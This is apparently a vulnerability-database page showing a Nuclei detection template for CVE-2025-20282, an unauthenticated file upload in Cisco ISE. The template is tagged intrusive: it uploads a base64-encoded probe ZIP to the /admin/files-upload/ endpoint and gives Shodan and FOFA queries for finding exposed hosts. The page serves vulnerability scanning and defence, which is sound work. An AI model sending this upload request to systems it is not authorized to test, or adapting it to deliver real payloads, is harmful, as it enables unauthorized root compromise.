Cisco ISE < 3.4P2 - Unauthenticated Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Exploit for CVE-2026-20180 | 21 Apr 202615:21 | – | githubexploit | |
| CVE-2025-20282 | 25 Jun 202517:15 | – | attackerkb | |
| The vulnerability of the private application programming interface of the Cisco Identity Services Engine (ISE) management platform allows a perpetrator to execute arbitrary code. | 27 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-20282 | 25 Jun 202516:47 | – | circl | |
| Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities | 25 Jun 202516:00 | – | cisco | |
| Cisco Identity Services Engine (cisco-sa-ise-unauth-rce-ZAd2GnJ6) | 25 Jun 202500:00 | – | nessus | |
| Cisco ISE和Cisco ISE-PIC 安全漏洞 | 25 Jun 202500:00 | – | cnnvd | |
| Cisco ISE and ISE-PIC File Upload Vulnerability | 26 Jun 202500:00 | – | cnvd | |
| CVE-2025-20282 | 25 Jun 202516:29 | – | cve | |
| CVE-2025-20282 Cisco ISE API Unauthenticated Remote Code Execution Vulnerability | 25 Jun 202516:29 | – | cvelist |
10
id: CVE-2025-20282
info:
name: Cisco ISE < 3.4P2 - Unauthenticated Arbitrary File Upload
author: 0x_Akoko,pdteam
severity: critical
description: |
Cisco ISE and Cisco ISE-PIC contain an unrestricted file upload vulnerability caused by lack of file validation in an internal API, letting unauthenticated remote attackers upload and execute files as root, exploit requires crafted file upload.
impact: |
Unauthenticated attackers can upload and execute arbitrary files as root, leading to full system compromise.
remediation: |
Update to the latest Cisco ISE and Cisco ISE-PIC versions with security patches.
reference:
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6
- https://riversecurity.eu/like-stealing-cisco-ise-cream-from-a-kid-weaponizing-a-cve/
- https://github.com/skadevare/CiscoISE-CVE-2025-20282-POC
- https://nvd.nist.gov/vuln/detail/CVE-2025-20282
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-20282
cwe-id: CWE-434
epss-score: 0.12033
epss-percentile: 0.95719
cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: cisco
product: identity_services_engine
shodan-query: '"Set-Cookie: APPSESSIONID=" "Path=/admin"'
fofa-query: title="identity services engine"
tags: cve,cve2025,cisco,cisco-ise,rce,file-upload,intrusive,vkev
variables:
probe_zip: "{{base64_decode('UEsDBBQAAAAAAHcdA12wBb+DFAAAABQAAAAJAAAAcHJvYmUudHh0Q1ZFLTIwMjUtMjAyODItcHJvYmVQSwECFAMUAAAAAAB3HQNdsAW/gxQAAAAUAAAACQAAAAAAAAAAAAAAgAEAAAAAcHJvYmUudHh0UEsFBgAAAAABAAEANwAAADsAAAAAAA==')}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /admin/login.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(header, "APPSESSIONID=")'
internal: true
- raw:
- |
POST /admin/files-upload/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----ISEProbe202520282
------ISEProbe202520282
Content-Disposition: form-data; name="file"; filename="probe.zip"
Content-Type: application/zip
{{probe_zip}}
------ISEProbe202520282--
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 422'
- 'contains(header, "walkme.com")'
condition: and
# digest: 4b0a00483046022100c2b4ed8059eaf77671d17092068fc4b1a34c772c3c88daf171a567a1fa32e346022100cadbdbb4bbd898b2bfe7ab8579d13ab67d4a828e6dd451a81a32955452378097:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2026 01:24Current
8.2High risk
Vulners AI Score8.2
CVSS 3.110
EPSS0.12033
SSVC